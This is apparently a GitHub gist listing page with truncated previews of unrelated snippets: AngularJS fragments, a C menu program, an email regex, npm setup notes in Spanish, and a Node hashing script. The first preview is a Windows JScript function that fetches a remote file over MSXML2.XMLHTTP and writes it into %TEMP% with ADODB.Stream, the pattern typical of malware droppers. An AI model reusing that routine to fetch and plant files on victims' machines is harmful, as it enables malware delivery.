This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function dl(fr,fn,rn) { | |
| var ws = new ActiveXObject("WScript.Shell"); | |
| var fn = ws.ExpandEnvironmentStrings("%TEMP%")+"\\"+fn; | |
| var xo = new ActiveXObject("MSXML2.XMLHTTP"); | |
| xo.onreadystatechange = function() { | |
| if (xo.readyState === 4) { | |
| var xa = new ActiveXObject("ADODB.Stream"); | |
| xa.open(); | |
| xa.type = 1; | |
| xa.write(xo.ResponseBody); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <head> | |
| <script scr="angular.js"></script> | |
| <script scr="ngroute.js"></script> | |
| <script scr="myApp.js"></script> | |
| <body np-app="myApp" ng-controller="NameController"> | |
| in myApp.js | |
| angular.module('myApp', ['ngRoute']).controller('NameController', ['$scope', function(scope){ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| angular.module('myApp', ['myModule']).controller('NameController', ['$scope', function(scope){ | |
| --... | |
| }]) | |
| <div ng-app="myApp" ng-controller="NameController"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <div ng-app ng-controller="selectController"> | |
| function selectController (){ | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| angular.directive('inValue',[ function () { | |
| return { | |
| restrict: 'A', | |
| require: 'ngModel', | |
| link : function(scope, elez, attrs) { | |
| var is = attrs.ngModel.split('.'); | |
| var spz = is[0]; | |
| is.splice(0,1); | |
| if( !scope[ spz ] ) | |
| scope[ spz ] = {}; |
Se tiene que descargar NodeJS, descarge estos dos archivos.
Abra una consola u terminal, escriba en la carpeta donde lo descargo estos archivos
$ npm install request async underscore
Ahora, modifique la configuracion es decir abra el archivo llamado prueba y coloque los datos
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include<stdio.h> | |
| int opcion=0,A=0, B=0, C=0,opciondos=0; | |
| main(){ | |
| printf("\n MENU DE EJERCICIOS "); | |
| printf("\n "); | |
| printf("\n "); | |
| printf("\n "); | |
| printf("\n PRESENTADO POR JORGE ENRIQUE CADENA ROJAS "); | |
| printf("\n "); | |
| printf("\n "); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /^[a-z|0-9]{2}[a-z|0-9|.|_|-]{1,32}@[a-z|0-9|-]{1,61}(.[ac|ad|ae|aero|af|ag|ai|al|am|an|ao|aq|ar|asia|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|biz|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cat|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|com|coop|co|cr|cs|cu|cv|cx|cy|cz|dd|de|dj|dk|dm|do|dz|ec|edu|ee|eg|eh|er|es|et|eu|eus|fi|fj|fk|fm|fo|fr|ga|gal|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|info|int|io|iq|ir|is|it|je|jm|jo|jobs|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mobi|mp|mq|mr|ms|mt|museum|mu|mv|mw|mx|my|mz|na|name|nc|ne|net|nf|ng|ni|nl|no|np|nr|nu|nz|om|org|pa|pe|pf|pg|ph|pk|pl|pm|pn|post|pr|pro|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tel|tf|tg|th|tj|tk|tl|tm|tn|to|tp|travel|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|xxx|ye|yt|yu|za|zm|zw]+){1,2}$/i |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var crypto = require('crypto'); | |
| var spawn = require('child_process').spawn; | |
| var hashes = spawn('openssl', ['list-message-digest-algorithms']); | |
| var hass = []; | |
| var msg = 'tpfccdlfdtte pcaccplircdt dklpcfrp?qeiq lhpqlipqeodf gpwafopwprti izxndkiqpkii krirrifcapnc dxkdciqcafmd vkfpcadf.'; | |
| hashes.stdout.on('data', function (data) { | |
| hass.push(data); | |
| }); |